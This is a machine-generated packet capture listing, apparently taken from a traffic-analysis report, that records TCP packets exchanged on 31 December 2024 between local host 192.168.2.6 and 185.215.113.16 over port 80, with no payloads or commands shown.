                                                                                                              Dec 31, 2024 09:48:43.984034061 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:43.984052896 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.984085083 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.984119892 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.984122992 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:43.984143972 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.984168053 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.984180927 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:43.984190941 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.984215975 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.984222889 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:43.984357119 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.984380960 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.984416008 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.984425068 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:43.984440088 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.984451056 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:43.984464884 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.984488010 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.984512091 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.984522104 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:43.984548092 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.984549046 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:43.984572887 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.984597921 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.984621048 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.984631062 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:43.984656096 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:43.984657049 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.984682083 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.984704971 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.984714031 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:43.984728098 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.984751940 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.984761953 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:43.984772921 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.984797001 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.984805107 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:43.984823942 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.984846115 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.984857082 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:43.984869957 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.984894037 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.984936953 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:43.985167980 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.985192060 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.985218048 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.985225916 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:43.985251904 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:43.985346079 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.985382080 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.985405922 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.985429049 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:43.985429049 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.985454082 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.985476971 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.985491991 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:43.985500097 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.985517979 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:43.985522985 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.985547066 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.985569000 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.985584021 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:43.985591888 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.985606909 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:43.985615969 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.985640049 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.985661983 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.985680103 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:43.985687017 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.985708952 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:43.985709906 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.985733986 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.985755920 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.985775948 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:43.985781908 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.985800028 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:43.985815048 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.985851049 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.985862970 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:43.985872030 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.985894918 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.985907078 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:43.985918999 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.985940933 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.985965967 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.985974073 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:43.985989094 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.985996962 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:43.986013889 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.986078024 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.986102104 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.986114979 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:43.986126900 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.986140966 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:43.986149073 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.986172915 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.986196041 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.986221075 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.986227036 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:43.986241102 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.986242056 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:43.986299992 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.986320972 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.986337900 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:43.986351013 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:43.986355066 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.986378908 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.986413002 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.986418962 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:43.986437082 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.986459970 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.986469984 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:43.986494064 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.986516953 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.986525059 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:43.986541986 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.986565113 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.986572981 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:43.986588955 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.986608028 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.986618042 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:43.986646891 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.986680031 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:43.986685991 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.986721039 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.986745119 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.986752987 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:43.986768007 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.986793995 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.986808062 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:43.986814022 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.986836910 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.986855984 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:43.986860037 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.986882925 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.986896992 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:43.986907005 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.986929893 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.986953974 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.986962080 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:43.986974001 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.986987114 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:43.987485886 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:43.988846064 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:44.031208992 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:44.031244993 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:44.031271935 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:44.031275988 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:44.031322002 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:44.106925964 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:44.106965065 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:44.106998920 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:44.107018948 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:44.108190060 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:44.108222961 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:44.108252048 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:44.108256102 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:44.108489990 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:44.108505964 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:44.108519077 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:44.108551979 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:44.108556986 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:44.108584881 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:44.108613014 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:44.108627081 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:44.108675003 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:44.108725071 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:44.108752966 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:44.108764887 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:44.108791113 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:44.108802080 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:44.108850956 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:44.108881950 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:44.108891010 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:44.108926058 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:44.108952999 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:44.108992100 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:44.109016895 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:44.109056950 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:44.109070063 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:44.109117031 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:44.109148979 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:44.109163046 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:44.109180927 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:44.109214067 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:44.109224081 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:44.109240055 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:44.109271049 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:44.109275103 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:44.109302998 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:44.109334946 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:44.109348059 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:44.109400034 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:44.109430075 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:44.109462023 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:44.109472036 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:44.109488964 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:44.109503031 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:44.109519958 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:44.109553099 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:44.109579086 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:44.109596968 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:44.109611034 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:44.109620094 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:44.109642982 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:44.109690905 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:44.109708071 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:44.109723091 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:44.109755039 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:44.109790087 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:44.109791040 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:44.109842062 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:44.109888077 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:44.109889984 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:44.109921932 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:44.109954119 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:44.109958887 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:44.110002041 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:44.110033989 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:44.110035896 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:44.110064983 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:44.110096931 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:44.110105991 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:44.110126972 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:44.110158920 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:44.110165119 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:44.110191107 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:44.110223055 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:44.110223055 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:44.110255003 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:44.110260010 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:44.110286951 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:44.110317945 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:44.110349894 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:44.110357046 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:44.110383034 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:44.110405922 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:44.110877037 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:44.110908985 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:44.110920906 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:44.110941887 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:44.110989094 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:44.111021996 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:44.111032009 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:44.111052990 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:44.111057043 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:44.111084938 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:44.111115932 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:44.111148119 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:44.111148119 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:44.111180067 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:44.111212015 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:44.111221075 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:44.111243963 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:44.111253023 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:44.111275911 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:44.111341953 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:44.111373901 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:44.111382008 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:44.111401081 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:44.111432076 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:44.111434937 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:44.111484051 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:44.111527920 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:44.111530066 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:44.111562967 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:44.111593962 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:44.111603022 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:44.111625910 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:44.111656904 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:44.111658096 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:44.111706972 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:44.111745119 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:44.111752987 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:44.111802101 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:44.111830950 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:44.111848116 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:44.111887932 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:44.111891985 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:44.111934900 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:44.111968040 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:44.111970901 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:44.111998081 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:44.112030029 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:44.112032890 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:44.112061977 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:44.112093925 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:44.112097979 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:44.112121105 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:44.112154007 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:44.112173080 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:44.112185001 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:44.112211943 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:44.112221003 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:44.112243891 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:44.112277031 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:44.112308025 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:44.112323999 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:44.112339973 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:44.112345934 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:44.112371922 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:44.112402916 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:44.112411022 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:44.112432957 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:44.112464905 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:44.112479925 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:44.112497091 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:44.112529993 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:44.112559080 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:44.112565041 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:44.112590075 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:44.112591028 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:44.112622023 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:44.112653971 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:44.112658024 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:44.112682104 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:44.112711906 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:44.112720013 CET4975480192.168.2.6185.215.113.16
